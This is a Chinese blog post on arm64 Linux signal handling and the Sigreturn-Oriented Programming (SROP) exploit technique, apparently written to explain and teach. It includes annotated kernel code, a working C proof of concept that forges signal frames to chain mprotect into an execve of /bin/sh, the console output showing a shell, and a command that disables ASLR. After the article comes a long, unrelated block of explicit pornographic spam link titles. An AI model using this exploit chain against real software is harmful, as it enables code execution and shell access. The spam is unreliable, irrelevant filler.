??其中do_signal=>get_signal負責從信號隊列中獲取一個信號,其定義如下:

/*此函數先從線程私有隊列中查找信號,沒有則從線程組共享信號隊列中查找信號:* 若一個信號調用默認處理函數,則此函數內部會直接將其處理掉.* 若一個信號指定要被忽略,則此函數會直接刪除并忽略此信號.* 若一個信號指定了handler,則此函數立即返回,不再處理其余信號.需要注意的是此函數會忽略當前線程block的信號(current->blocked) */ bool get_signal(struct ksignal *ksig) {/* 線程組共用結構體 */struct sighand_struct *sighand = current->sighand;struct signal_struct *signal = current->signal;int signr;/* 信號處理要返回用戶態,在此之前task如果有work需要做則先執行work函數 */if (unlikely(current->task_works))task_work_run();...... relock:spin_lock_irq(&sighand->siglock);......for (;;) {struct k_sigaction *ka;......signr = dequeue_synchronous_signal(&ksig->info); /* 優先處理同步信號,如 SIGTRAP *//* 從線程pending/shared_pending隊列中獲取一個信號并將其移出隊列(dequeue), 當前線程blocked的信號會被忽略 */if (!signr)signr = dequeue_signal(current, &current->blocked, &ksig->info);if (!signr) break; /* 沒有其他信號需要處理則跳出循環 */ka = &sighand->action[signr-1];......if (ka->sa.sa_handler == SIG_IGN) /* 若此信號標記為被忽略,則處理下一個信號 */continue;if (ka->sa.sa_handler != SIG_DFL) { /* 若找到了一個需要調用handler的信號,則記錄信息后返回 *//* Run the handler. */ksig->ka = *ka;if (ka->sa.sa_flags & SA_ONESHOT) /* oneshot的信號需要重置為默認handler */ka->sa.sa_handler = SIG_DFL;break; }/* 到這里說明此信號要調用默認的處理函數,對于默認處理函數為忽略的信號直接continue處理下一個 */if (sig_kernel_ignore(signr)) /* Default is nothing. */continue;if (sig_kernel_stop(signr)) {......}fatal: /* 當收到SIGKILL等信號時會走這里 */.......if (sig_kernel_coredump(signr)) {.......do_coredump(&ksig->info);}.......do_group_exit(ksig->info.si_signo);}spin_unlock_irq(&sighand->siglock); out:ksig->sig = signr;......return ksig->sig > 0; }

??其中do_signal=>get_signal=>dequeue_synchronous_signal/dequeue_signal邏輯類似,這里僅以dequeue_signal為例:

/* 此函數從pending/shared_pending中下鏈一個信號, 并檢查此線程組中是否還有需要處理的信號,沒有則清空線程的TIF_SIGPENDING. 此函數中的mask為阻塞掩碼, 被阻塞的信號在查找過程中被忽略. */ int dequeue_signal(struct task_struct *tsk, sigset_t *mask, kernel_siginfo_t *info) {bool resched_timer = false;int signr;/* 從pending隊列下鏈一個信號并通過info返回,需要注意的是這里傳入的mask是block掩碼, 即信號獲取時會忽略被block的信號 */signr = __dequeue_signal(&tsk->pending, mask, info, &resched_timer);if (!signr) {/* 如線程私有的pending隊列中沒有信號,則檢查線程組的shared_pending隊列是否有要處理信號 */signr = __dequeue_signal(&tsk->signal->shared_pending, mask, info, &resched_timer);......}/* 若此線程的私有信號隊列(pending)或線程組信號隊列(shared_pending)中還有信號,則當前線程不會清空TIF_SIGPENDING,清空則代表所有信號都處理完畢 */recalc_sigpending();if (!signr) return 0;.......return signr; }

??在確定信號需要執行handler后, do_signal=>handle_signal負責將handler函數指針設置到用戶態執行上下文中,其代碼如下:

static void handle_signal(struct ksignal *ksig, struct pt_regs *regs) {sigset_t *oldset = sigmask_to_save();int usig = ksig->sig;int ret;....../*在用戶棧上為信號分配棧幀,其中保留用戶態當前上下文(pt_regs); 同時設置新的用戶態上下文,包括pc指向信號處理函數, sp指向新棧頂,信號處理函數返回地址設置為__kernel_rt_sigreturn等.此函數設置后, 當此異常返回到用戶態時會直接跳轉到信號處理函數.*/ret = setup_rt_frame(usig, ksig, oldset, regs);ret |= !valid_user_regs(&regs->user_regs, current); /* 檢查單步調試和pstate等狀態狀態是否正確 */....... }

? 其中setup_rt_frame負責在用戶態棧上保存異常前的執行環境,并設置用戶態返回后直接跳轉到信號處理函數:

/*內核會在用戶態棧幀中為每個信號處理函數構建一個棧幀, 此棧幀由一個 rt_sigframe + frame_record結構體組成,其中:* rt_sigframe結構體負責記錄當前信號信息和信號發生時用戶態的上下文信息* frame_record用來支持棧回溯,其fp/lr分別來自rt_sigframe.uc.uc_mcontext.regs[29]/regs[30]ps: 對于用戶態,其可以設置使用當前函數棧作為信號處理的棧幀,也可以單獨為信號創建一個信號棧幀. */ struct rt_sigframe {struct siginfo info; /* 記錄當前信號處理函數處理的信號信息 */struct ucontext uc; /* 記錄當前信號處理函數執行前的用戶態上下文 */ };struct frame_record {u64 fp;u64 lr; }; /*此函數在用戶棧上為信號分配棧幀,其中保留用戶態當前上下文(pt_regs); 同時設置新的用戶態上下文,包括pc指向信號處理函數, sp指向新棧頂,信號處理函數返回地址設置為__kernel_rt_sigreturn等. */ static int setup_rt_frame(int usig, struct ksignal *ksig, sigset_t *set, struct pt_regs *regs) {struct rt_sigframe_user_layout user;struct rt_sigframe __user *frame;int err = 0;....../*在當前用戶棧或用戶態專用信號棧上計算下一個信號棧幀需要的空間,此空間包含一個 rt_sigframe 和一個 frame_record結構體, 二者的(用戶態)地址分別記錄在user->sigframe/next_frame中, 此時regs->sp(即用戶態上下文)尚未被修改.為了便于理解,后面僅以信號直接使用用戶棧的情況為例; frame_record只用于棧回溯,同樣也忽略;*/if (get_sigframe(&user, ksig, regs))return 1;frame = user.sigframe; /* 獲取用戶態剛分配的的rt_sigframe結構體指針 */....../* 將信號發生前用戶態上下文(pt_regs)記錄到用戶態棧 user->sigframe.uc.uc_mcontext中 */err |= setup_sigframe(&user, regs, set);if (err == 0) {/* 設置新的pt_regs,對pt_regs的修改在返回用戶態后會直接使控制流轉移到信號處理函數:* 用戶態pc(regs->pc) 指向用戶態handler* 函數返回地址(regs->regs[30]) 指向vdso __kernel_rt_sigreturn* 設置正確的用戶態棧幀用戶態信號處理函數ret返回后會跳轉到 __kernel_rt_sigreturn 繼續執行*/setup_return(regs, &ksig->ka, &user, usig);/* 如果需要siginfo則復制回用戶態,體現為信號處理函數的參數0/1 */if (ksig->ka.sa.sa_flags & SA_SIGINFO) { err |= copy_siginfo_to_user(&frame->info, &ksig->info);regs->regs[1] = (unsigned long)&frame->info;regs->regs[2] = (unsigned long)&frame->uc;}}return err; }

4.3 中斷處理函數執行完畢后恢復用戶態上下文

? 由上可知,當內核發現一個信號需要執行信號處理函數時, 會保存當前用戶態上下文并重置為信號處理的上下文。

? ?當前用戶態上下文是保存在用戶態棧中, 信號處理函數執行完畢后需要恢復到原有用戶態上下文執行, 這一步上下文恢復操作是通過sys_rt_sigreturn系統調用完成的, 在設置信號處理上下文時setup_rt_frame會設置其返回地址為__kernel_rt_sigreturn, 這樣信號處理函數執行完畢后即可以無感知的通過正常函數返回(ret)跳轉并執行sys_rt_sigreturn系統調用,sys_rt_sigreturn定義如下:

SYSCALL_DEFINE0(rt_sigreturn) {struct pt_regs *regs = current_pt_regs(); /* 獲取用戶態當前上下文 */struct rt_sigframe __user *frame;......frame = (struct rt_sigframe __user *)regs->sp; /* 獲取用戶態棧幀中的 rt_sigframe指針 */if (!access_ok(frame, sizeof (*frame))) /* 棧幀只能來自用戶態 */goto badframe;/* 從用戶態棧幀恢復之前的上下文,在恢復前要檢查可能導致提權的pstate等值 */if (restore_sigframe(regs, frame)) goto badframe;......./* regs[0]是系統調用前用戶態的R0, 若此調用來自用戶態信號處理函數(最后的ret),則R0記錄的是信號處理函數的返回值 */return regs->regs[0]; badframe:arm64_notify_segfault(regs->sp);return 0; }

??其中restore_sigframe用來從用戶態棧幀恢復原本的用戶態上下文,其定義如下:

static int restore_sigframe(struct pt_regs *regs, struct rt_sigframe __user *sf) {sigset_t set;int i, err;struct user_ctxs user;/* 從用戶態棧幀復制并設置新的block掩碼 */err = __copy_from_user(&set, &sf->uc.uc_sigmask, sizeof(set));if (err == 0)set_current_blocked(&set);/* 從用戶態棧幀恢復原有的用戶態上下文 */for (i = 0; i < 31; i++)__get_user_error(regs->regs[i], &sf->uc.uc_mcontext.regs[i], err);__get_user_error(regs->sp, &sf->uc.uc_mcontext.sp, err);__get_user_error(regs->pc, &sf->uc.uc_mcontext.pc, err);/* pstate同樣來自用戶態,但在此函數末尾要經過充分檢查 */__get_user_error(regs->pstate, &sf->uc.uc_mcontext.pstate, err);forget_syscall(regs); /* 確保sys_rt_sigreturn返回任何值都不會導致系統調用重新執行 *//* 檢查用戶態參數的安全性, 如pstate最終會被設置到cpsr中, 如果其設置有錯誤可能會導致用戶態異常級別被提升,故這里需要進行充分的檢查. */err |= !valid_user_regs(&regs->user_regs, current);......return err; /* 當前用戶態寄存器已經均回復到信號處理函數發生前的狀態了, 此時返回用戶態 */ }

4.4 內核線程信號處理舉例

這里以內核線程 jffs2_garbage_collect_thread為例:

static int jffs2_garbage_collect_thread(void *_c) {.......siginitset(&hupmask, sigmask(SIGHUP));allow_signal(SIGKILL); /* 允許用戶態發送 SIGKILL/SIGSTOP/SIGHUP 信號 */allow_signal(SIGSTOP);allow_signal(SIGHUP);.......for (;;) { /* 處理收到的用戶態發送的*/.......while (signal_pending(current) || freezing(current)) {.......signr = kernel_dequeue_signal();switch(signr) {case SIGSTOP:jffs2_dbg(1, "%s(): SIGSTOP received\n", __func__);kernel_signal_stop();break;case SIGKILL:jffs2_dbg(1, "%s(): SIGKILL received\n", __func__);goto die;case SIGHUP:jffs2_dbg(1, "%s(): SIGHUP received\n", _func__);break;default:jffs2_dbg(1, "%s(): signal %ld received\n",__func__, signr);}}....... }

五、SROP原理與安全性分析

? 在DEP(Data Execution Prevention)普遍部署之后, 控制流劫持后跳轉到數據執行shellcode(如棧溢出后跳轉到棧執行)的方式就基本無法使用了。攻擊者通常只能通過ret2xxx(如ret2libc/ROP/JOP)的方式執行其所需要的代碼邏輯,但構建這樣的執行序列通常并不容易,以ROP(Return Orientend Programming)為例,攻擊者通常需要滿足以下前提:

1) 攻擊者可以在目標應用中收集到足夠多的gadgets且可以確定其運行時地址

2) 攻擊者可以在程序運行時將適合的數據布局到棧中

3) 攻擊者可以利用漏洞劫持控制流并跳轉到第一個gadget

對于 1) 來說能否滿足條件:

  • 首先取決于目標應用中是否存在滿足攻擊者需要的gadget
  • 其次二進制及其運行庫的版本對gadget的影響極大, 不同版本的適配需要大量的工作,exp的通用性也難以保證
  • 一些安全特性也會增加gadget獲取難度,如:
    • gadget消除技術可能導致無法獲取所需的gadgets
    • ASLR隨機化會使獲取gadgets的運行時地址更加困難

而 SROP(Sigreturn Orientend Programming)[1,2]的出現則可以解決1)中遇到的絕大多數問題:

  • 最理想情況下, SROP只需要一個不需要參數的sigreturn gadget既可以完成execve。
  • sigreturn 在大多數系統(Linux/Android/BSD/Max OS/...) 運行時的大多數可執行文件中幾乎都存在,這會極大減少適配工作,exp也可以更加通用。
  • 安全特性對SROP沒有保護或較容易繞過:
    • ASLR最多只需要一個infoleak即可獲取sigreturn地址,在某些系統中此地址甚至是固定的。
    • sigreturn是信號處理必須的系統調用,從Unix開始就一直存在超過40年, 此gadget在二進制中難以被消除。

以AArch64為例, 由前面可知在信號處理的過程中:

  • 內核不負責保存信號處理函數執行前的用戶態上下文,這些信息會保存在用戶態棧幀中
  • 內核返回用戶態執行信號處理之前會設置信號處理函數的返回地址(x30)指向[vdso]中的__kernel_rt_sigreturn函數
  • 信號處理函數執行完畢后通過ret指令跳轉到__kernel_rt_sigreturn.
  • __kernel_rt_sigreturn通過svc指令調用系統調用sys_[rt_]sigreturn,從用戶態棧中恢復信號前的用戶態上下文,最終返回到用戶態的此上下文繼續執行,此函數定義如下:
  • ##內核代碼 ##./arch/arm64/kernel/vdso/sigreturn.S SYM_CODE_START(__kernel_rt_sigreturn)mov x8, #__NR_rt_sigreturnsvc #0 SYM_CODE_END(__kernel_rt_sigreturn## 用戶態運行時的vdso 00400000-00479000 r-xp 00000000 00:02 5 /main 00489000-0048a000 r--p 00079000 00:02 5 /main 0048a000-0048c000 rw-p 0007a000 00:02 5 /main 0048c000-0048f000 rw-p 00000000 00:00 0 28044000-28066000 rw-p 00000000 00:00 0 [heap] ffffa0c63000-ffffa0c65000 r--p 00000000 00:00 0 [vvar] ffffa0c65000-ffffa0c66000 r-xp 00000000 00:00 0 [vdso] fffff31e5000-fffff3206000 rw-p 00000000 00:00 0 [stack]__kernel_rt_sigreturn:0xffffa0c6585c: mov x8, #0x8b // #139 __NR_rt_sigreturn0xffffa0c65860: svc #0x0 //d4000001

    ? 這也就意味著只要攻擊者控制了當前棧幀并執行一個sys_rt_sigreturn后,既可以控制當前用戶態的所有通用硬件寄存器,包括:

    • R0-R29:即攻擊者可以控制所有參數
    • R30: 即攻擊者可以控制后續的函數返回地址
    • PC: 即攻擊者可以控制sys_rt_sigreturn返回的地址
    • SP: 即攻擊者可以控制返回后的棧幀

    ? 簡單說sigreturn實際上就是一個能力極其強大的gadget,其可以完成任何參數設置,控制流轉移,返回地址設置,堆棧指針修改操作。且由于sigreturn中本身就存在一條svc指令,攻擊者同時還可以復用此gadget執行一次execve來獲取本地shell。利用SROP執行execve的流程如下圖:

    ? 但需要注意的是如果使用SROP來chain多個系統調用時,則還需一個額外的 syscall& ret; gadget, 這是因為 __kernel_rt_sigreturn中雖然有一個可用的svc指令,但其后面通常沒有ret指令,因此此svc指令其不能用來鏈接gadget chain。 如當攻擊者需要執行如 mprotect + shellcode時, 則需要找到一個 svc 0; ret; 指令序列來確保 mprotect系統調用執行完畢后會有一條ret指令可以返回到sigreturn 設置的lr寄存器位置。以下代碼可用來簡單測試SROP和基于SROP的syscall chain:

    #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <errno.h> #include <signal.h> #include <fcntl.h> #include <asm/ucontext.h> #include <sys/syscall.h> #include <sys/mman.h>/* rt_sigreturn check if sp is 16 byte aligned */ #define _ROUND_UP(x,n) (((x)+(n)-1u) & ~((n)-1u)) #define ROUND_UP(x) _ROUND_UP(x,16LL) #define ROUND_DOWN(x) ((x) & (~((16LL)-1)))struct sigframe {siginfo_t info;struct ucontext uc; };struct sigframe g_backup; /* used to stuff new sigframe */ void * sigreturn_addr; /* address of sigreturn */ void * syscall_ret_addr; /* address of a gadget has syscall with ret insn to chain next directive */ void syscall_ret(void) {asm("svc 0\n\t" :::); /* simpliy emulate a syscall with ret*/ }void action(int signo, siginfo_t *info, void *ctx) {/* check struct size match */struct sigframe *sf = (void *)info;if(&sf->uc != ctx) {printf("[-] sigframe struct size mismatch\n");exit(0);}sigreturn_addr = __builtin_return_address(0); /* get sigreturn address */g_backup.info = *info;g_backup.uc = *(struct ucontext *)ctx;return; }void get_sys_from_signal(void) {struct sigaction act;sigset_t set, oldset;act.sa_sigaction = action;act.sa_flags = SA_SIGINFO;sigemptyset(&act.sa_mask);sigemptyset(&set);sigemptyset(&oldset);sigaddset(&set, SIGUSR1);sigaction(SIGUSR1, &act, NULL);sigprocmask(SIG_SETMASK, &set, &oldset);kill(getpid(), SIGUSR1);/* signal handler will executed before this sycall return */sigprocmask(SIG_SETMASK, &oldset, NULL); }void env_init(void) {/* get addr of sigreturn & syscall insns. */get_sys_from_signal();syscall_ret_addr = &syscall_ret;if(!sigreturn_addr) {printf("[-] sigreturn_addr not set.\n");return 0;}printf("[+] sigreturn addr:%p, syscall_ret addr:%p\n", \sigreturn_addr, syscall_ret_addr); }void show_maps(void) {int ret;char buf[0x100];int fd = open("/proc/self/maps", O_RDONLY);do {memset(buf, 0, sizeof(buf));ret = read(fd, buf, sizeof(buf));write(1, &buf, ret);} while(ret);write(1, "\n", 1);close(fd); }/*This function is used to simulate the vulnerability,(for simplicity) it directly switches the current sp */ void vul_trigger(unsigned long * new_sp) {asm("mov sp, %0\n\t"::"r"(new_sp):);/* ret address should be pop from epilogue in real exp,for stability in the test case, we just change it manurally*/register volatile unsigned long lr asm("x30") = sigreturn_addr;asm("ret\n\t"); }void stuff_sigframe3(struct sigframe * sf, int scno,void * pc, void * lr, void * sp,void * arg0, void * arg1, void *arg2) {struct ucontext * uc = &sf->uc;memset(sf, 0, sizeof(struct sigframe));uc->uc_mcontext = g_backup.uc.uc_mcontext; /* __reserved copies from g_backup */uc->uc_mcontext.regs[30] = lr;uc->uc_mcontext.pc = pc;uc->uc_mcontext.sp = sp;uc->uc_mcontext.regs[8] = scno;uc->uc_mcontext.regs[0] = arg0;uc->uc_mcontext.regs[1] = arg1;uc->uc_mcontext.regs[2] = arg2; }void sigframe_push_mprotect(struct sigframe * frame, void * addr,unsigned long size, int prot, void * pc, void * lr, void * sp) {printf("[+] add to sigframe(%016p): mprotect(%p, %x, %x); \n", frame, addr, size, prot);stuff_sigframe3(frame, SYS_mprotect, pc, lr, sp, addr, size, prot); }void sigframe_push_exec(struct sigframe * frame, char * name,void * argv, void * envp, void * pc, void * sp, void * lr) {printf("[+] add to sigframe(%016p): execve(%s, %p, %p); \n", frame, name, argv, envp);stuff_sigframe3(frame, SYS_execve, pc, lr, sp, name, argv, envp); }void test_mprotect(void * sigret_stack, void * addr, int size, int prot) {unsigned long ret = __builtin_return_address(0);unsigned long cfa = __builtin_frame_address(1);/* set a sigframe for sigreturn to call mprotect, and set paramters to let mprot return to the write caller (current lr), with right sp (cfa). */sigframe_push_mprotect(sigret_stack, addr, size, prot, syscall_ret_addr, ret, cfa);vul_trigger(sigret_stack); }void test_mprotect_wrapper(void) {/* For qemu-user, this struct can't put in funcion like test_mprotect_wrapper,otherwise the vdso insn will lost (should be a bug of qemu) */struct sigframe frame __attribute__((aligned(0x10)));void * sigret_stack = &frame;/* set a 'ret' insn in no executable stack for test if mprotect is succeed. */unsigned long __attribute__((aligned(0x1000))) data = 0xd65f03c0; test_mprotect(sigret_stack, &data, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC);/* stack is RWX for now, function p only execute a single 'ret' insn and canreturn normally. It will cause a crash if mprotect not work. */void (*p)(void) = &data;p(); }struct sigframe_for_exec {struct sigframe frame __attribute__((aligned(0x10)));void * argv[2] __attribute__((aligned(0x10)));char name[0]; };void * test_exec(char * name, int shot) {unsigned long ret = __builtin_return_address(0);unsigned long cfa = __builtin_frame_address(1);void * arg0, * arg1 = NULL, * arg2 = NULL;/* for busybox, we need to give a argv {"/bin/sh", NULL};for real shell it can be zero;*/int strlength = ROUND_UP(strlen(name) + 1);int size = ROUND_UP(sizeof(struct sigframe_for_exec) + strlength);struct sigframe_for_exec * sf_exec = malloc(size);memset(sf_exec, 0, size);arg0 = sf_exec->name;memcpy(arg0, name, sizeof(name));/* --------- no need for real shell ------ */sf_exec->argv[0] = arg0;arg1 = sf_exec->argv;/* ----------------------------------- */sigframe_push_exec(&sf_exec->frame, arg0, arg1, arg2, sigreturn_addr + 4, ret, cfa);if(shot)vul_trigger(sf_exec);elsereturn sf_exec; }void test_mprotect_exec() {/* For qemu-user, this struct can't put in funcion like test_mprotect_wrapper,otherwise the vdso insn will lost (should be a bug of qemu) */struct sigframe frame __attribute__((aligned(0x10)));void * next_sigframe = &frame;void * prev_sigframe = test_exec("/bin/sh", 0);unsigned long ret = __builtin_return_address(0);unsigned long cfa = __builtin_frame_address(1);/*// for exec mprotect1) set stack executable: ret & 0xfff, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC2) call sigreturn, set pc = syscall_ret_addr, which can use a 'svc' insn to execute mprotect3) next insn of 'svc' is a 'ret', 'ret' will redirect pc to sigreturn_addr (address of sigreturn)// for exec execve4) call sigreturn again, just set pc = 'sigreturn + 4', use that 'svc' to execute execve syscallexecve will not return, so 'ret' insn is not needed in this case.pc = syscall_ret_addr is used in step 2) to call a mprotect and is next insn used to control the control flow.lr = sigreturn_addr is used in step 3) to chain mprotect with another sigreturnsp = prev_sigframe is used in step 4) as paramter of sigreturn to redirect control to next 'svc', aka execve.*/sigframe_push_mprotect(next_sigframe, \ret & ~(0xfff), 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, \syscall_ret_addr, sigreturn_addr, prev_sigframe);vul_trigger(next_sigframe); }int main() {show_maps();env_init();test_mprotect_wrapper(); /* mprotect and return normally */printf("[+] test mprotect RWX succeed!\n");//test_exec("/bin/sh", 1); /* execve only */test_mprotect_exec(); /* chain mprotext with a execve */return 0; }

    ??test case 輸出如下:

    Please press Enter to activate this console. # # ./main 00400000-00479000 r-xp 00000000 00:02 5 /main 00489000-0048a000 r--p 00079000 00:02 5 /main 0048a000-0048c000 rw-p 0007a000 00:02 5 /main 0048c000-0048f000 rw-p 00000000 00:00 0 2dedf000-2df01000 rw-p 00000000 00:00 0 [heap] ffffbaf5a000-ffffbaf5c000 r--p 00000000 00:00 0 [vvar] ffffbaf5c000-ffffbaf5d000 r-xp 00000000 00:00 0 [vdso] ffffccde0000-ffffcce01000 rw-p 00000000 00:00 0 [stack][+] sigreturn addr:0xffffbaf5c85c, syscall_ret addr:0x4006e4 [+] add to sigframe(0x00ffffccdff100): mprotect(0xffffccdff000, 1000, 7); [+][kernel] mprotect called with addr:0000ffffccdff000, len:1000, prot:7 ## 內核日志,mprotect調用時打印信息 [+] test mprotect RWX succeed! [+] add to sigframe(0x0000002dee13d0): execve(/bin/sh, 0x2dee2620, (nil)); [+] add to sigframe(0x00ffffccdff0f0): mprotect(0x400000, 1000, 7); [+][kernel] mprotect called with addr:0000000000400000, len:1000, prot:7 ## 內核日志,mprotect調用時打印信息 # exit ## 兩個exit退出, /bin/sh執行成功 # exit Please press Enter to activate this console.

    PS:

    vdso的地址是通過mmap分配出來的,故用戶態ASLR可以對攻擊者增加一個infoleak的難度, randomize_va_space >=1 時用戶態進程開啟VDSO(mmap)隨機化[4]:

    / # cat /proc/self/maps|grep vdso ffffaf823000-ffffaf824000 r-xp 00000000 00:00 0 [vdso] / # cat /proc/self/maps|grep vdso ffffbb68a000-ffffbb68b000 r-xp 00000000 00:00 0 [vdso]/ # echo 0 > /proc/sys/kernel/randomize_va_space / # cat /proc/self/maps|grep vdso fffff7fff000-fffff8000000 r-xp 00000000 00:00 0 [vdso] / # cat /proc/self/maps|grep vdso fffff7fff000-fffff8000000 r-xp 00000000 00:00 0 [vdso]

    參考資料:

    [0] 《Linux/Unix 系統編程手冊》

    [1] Framing Signals -- A Return to Portable Shellcode

    [2] Framing Signals -- A Return to Portable Shellcode(slides)

    [3] SROP_「二進制安全pwn基礎」 - 網安

    [4] https://docs.oracle.com/cd/E37670_01/E36387/html/ol_aslr_sec.html

    總結

    以上是生活随笔為你收集整理的linux中的信号处理与SROP的全部內容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

    亚洲欧美中文字幕5发布 | 性欧美大战久久久久久久 | 国产9 9在线 | 中文 | 亚洲国产精品毛片av不卡在线 | 亚洲精品国产精品乱码视色 | 中文字幕无码乱人伦 | 欧美黑人乱大交 | 亚洲乱码日产精品bd | 久久久久久av无码免费看大片 | 国产精品无码成人午夜电影 | 日日摸夜夜摸狠狠摸婷婷 | 久久久无码中文字幕久... | 欧美性猛交xxxx富婆 | 99久久亚洲精品无码毛片 | 亚洲精品欧美二区三区中文字幕 | 国产亚洲视频中文字幕97精品 | 美女扒开屁股让男人桶 | 国产一区二区三区精品视频 | 亚洲欧美日韩成人高清在线一区 | 国产精品亚洲综合色区韩国 | 鲁大师影院在线观看 | 色情久久久av熟女人妻网站 | 少妇高潮喷潮久久久影院 | 无码播放一区二区三区 | 国产精品99爱免费视频 | 最新版天堂资源中文官网 | 精品 日韩 国产 欧美 视频 | 中文字幕无码人妻少妇免费 | 国产精品久久久一区二区三区 | 国产乱人偷精品人妻a片 | 大胆欧美熟妇xx | 玩弄少妇高潮ⅹxxxyw | 超碰97人人射妻 | 亚洲欧美国产精品久久 | 强开小婷嫩苞又嫩又紧视频 | 老太婆性杂交欧美肥老太 | 久久无码中文字幕免费影院蜜桃 | 精品亚洲成av人在线观看 | 欧美成人午夜精品久久久 | 激情亚洲一区国产精品 | 欧美成人免费全部网站 | 成 人 免费观看网站 | 99精品视频在线观看免费 | 人妻天天爽夜夜爽一区二区 | 四十如虎的丰满熟妇啪啪 | 欧美午夜特黄aaaaaa片 | 香港三级日本三级妇三级 | 精品日本一区二区三区在线观看 | 精品久久久久久人妻无码中文字幕 | 精品国偷自产在线视频 | 成人一在线视频日韩国产 | 色欲人妻aaaaaaa无码 | 久久精品女人天堂av免费观看 | 国产精品-区区久久久狼 | 麻花豆传媒剧国产免费mv在线 | 麻豆精产国品 | 国产av一区二区三区最新精品 | 99久久亚洲精品无码毛片 | 国产熟女一区二区三区四区五区 | 亚洲一区二区三区国产精华液 | 欧美激情内射喷水高潮 | 久久久无码中文字幕久... | 帮老师解开蕾丝奶罩吸乳网站 | 撕开奶罩揉吮奶头视频 | 亚洲精品一区二区三区婷婷月 | 中文精品久久久久人妻不卡 | 久久久久国色av免费观看性色 | 免费乱码人妻系列无码专区 | 欧美成人家庭影院 | 色偷偷av老熟女 久久精品人妻少妇一区二区三区 | 欧美xxxx黑人又粗又长 | 亚洲啪av永久无码精品放毛片 | 精品国产一区av天美传媒 | 亚洲a无码综合a国产av中文 | 精品国产国产综合精品 | 日韩欧美中文字幕公布 | 国产精品亚洲综合色区韩国 | 蜜桃av蜜臀av色欲av麻 999久久久国产精品消防器材 | 午夜无码人妻av大片色欲 | 亚洲国产一区二区三区在线观看 | 成年女人永久免费看片 | 亚洲一区二区三区香蕉 | 亚洲一区二区三区偷拍女厕 | 激情内射日本一区二区三区 | 成人精品天堂一区二区三区 | 色婷婷av一区二区三区之红樱桃 | 台湾无码一区二区 | 97se亚洲精品一区 | 亚洲成av人片天堂网无码】 | 荫蒂被男人添的好舒服爽免费视频 | 中文字幕色婷婷在线视频 | 激情爆乳一区二区三区 | 亚洲欧美日韩国产精品一区二区 | 免费人成网站视频在线观看 | 国产一区二区不卡老阿姨 | 岛国片人妻三上悠亚 | 无码播放一区二区三区 | 日日碰狠狠躁久久躁蜜桃 | 九月婷婷人人澡人人添人人爽 | 窝窝午夜理论片影院 | 成人av无码一区二区三区 | 亚洲 a v无 码免 费 成 人 a v | 人人爽人人澡人人高潮 | 欧美人与善在线com | 国内揄拍国内精品人妻 | 国产综合在线观看 | 久久99精品国产麻豆 | 精品无码成人片一区二区98 | 亚洲男人av天堂午夜在 | 中文无码精品a∨在线观看不卡 | 精品久久久久香蕉网 | 无码中文字幕色专区 | 少妇的肉体aa片免费 | 狠狠色色综合网站 | 人妻无码αv中文字幕久久琪琪布 | 中文字幕无码视频专区 | 亚洲国产成人a精品不卡在线 | 国产精品嫩草久久久久 | 亚洲乱码中文字幕在线 | 中文字幕精品av一区二区五区 | 亚洲高清偷拍一区二区三区 | 成人三级无码视频在线观看 | 成人欧美一区二区三区黑人 | 99精品无人区乱码1区2区3区 | 中国女人内谢69xxxx | 日韩在线不卡免费视频一区 | 亚洲の无码国产の无码影院 | 国产国产精品人在线视 | 国产va免费精品观看 | 国产亚洲精品久久久久久久久动漫 | 亚洲精品鲁一鲁一区二区三区 | 亚洲一区二区三区 | 中文字幕无码乱人伦 | 日日橹狠狠爱欧美视频 | 国产免费久久精品国产传媒 | 亚洲欧美日韩综合久久久 | 无码精品国产va在线观看dvd | 最近免费中文字幕中文高清百度 | 国产精品久久久久久久9999 | 日韩精品无码一本二本三本色 | 中文字幕无码人妻少妇免费 | 青草视频在线播放 | av无码电影一区二区三区 | 三级4级全黄60分钟 | 麻豆国产人妻欲求不满谁演的 | 久9re热视频这里只有精品 | 亚洲中文字幕无码一久久区 | 久久久久av无码免费网 | 日本欧美一区二区三区乱码 | 国产亚洲精品精品国产亚洲综合 | 国产区女主播在线观看 | 久久精品女人天堂av免费观看 | 啦啦啦www在线观看免费视频 | 丝袜足控一区二区三区 | 波多野结衣aⅴ在线 | 欧美熟妇另类久久久久久多毛 | 中文无码成人免费视频在线观看 | 精品亚洲韩国一区二区三区 | 性欧美大战久久久久久久 | 成人女人看片免费视频放人 | 久久久久久久久888 | 2019nv天堂香蕉在线观看 | 久久久久免费精品国产 | 动漫av网站免费观看 | 亚洲成a人一区二区三区 | 国产成人精品三级麻豆 | 99久久99久久免费精品蜜桃 | 一本一道久久综合久久 | 俺去俺来也www色官网 | 99在线 | 亚洲 | 日本乱偷人妻中文字幕 | 在线成人www免费观看视频 | 俺去俺来也www色官网 | 高潮毛片无遮挡高清免费 | 国产在线aaa片一区二区99 | 老熟妇乱子伦牲交视频 | 亚洲日韩av一区二区三区四区 | 亚洲一区二区三区 | 国产莉萝无码av在线播放 | 一区二区三区乱码在线 | 欧洲 | 国产人妻大战黑人第1集 | 成熟人妻av无码专区 | 国产三级精品三级男人的天堂 | 成人无码精品一区二区三区 | 国产乱人伦偷精品视频 | 免费播放一区二区三区 | 内射白嫩少妇超碰 | 久久综合久久自在自线精品自 | 午夜理论片yy44880影院 | 久久久国产一区二区三区 | 亚洲成a人片在线观看无码 | 欧美日本免费一区二区三区 | 国产成人无码a区在线观看视频app | 久久99精品国产麻豆蜜芽 | 男人的天堂2018无码 | 一个人看的www免费视频在线观看 | 午夜性刺激在线视频免费 | 99精品国产综合久久久久五月天 | 自拍偷自拍亚洲精品10p | 亚洲熟妇色xxxxx欧美老妇 | 好男人www社区 | 国产精品无码mv在线观看 | 欧美午夜特黄aaaaaa片 | 亚洲熟妇色xxxxx欧美老妇y | 国产一精品一av一免费 | 久久久久久亚洲精品a片成人 | 熟妇人妻无乱码中文字幕 | 国产农村乱对白刺激视频 | 精品日本一区二区三区在线观看 | 美女黄网站人色视频免费国产 | 爽爽影院免费观看 | 丰满肥臀大屁股熟妇激情视频 | 99国产精品白浆在线观看免费 | 亚洲熟妇色xxxxx欧美老妇y | 日韩欧美成人免费观看 | 人人妻人人澡人人爽人人精品 | 亚洲综合另类小说色区 | 日日橹狠狠爱欧美视频 | 亚洲日韩乱码中文无码蜜桃臀网站 | 久久久中文久久久无码 | 色综合久久久无码中文字幕 | 成人无码视频免费播放 | 国产超级va在线观看视频 | 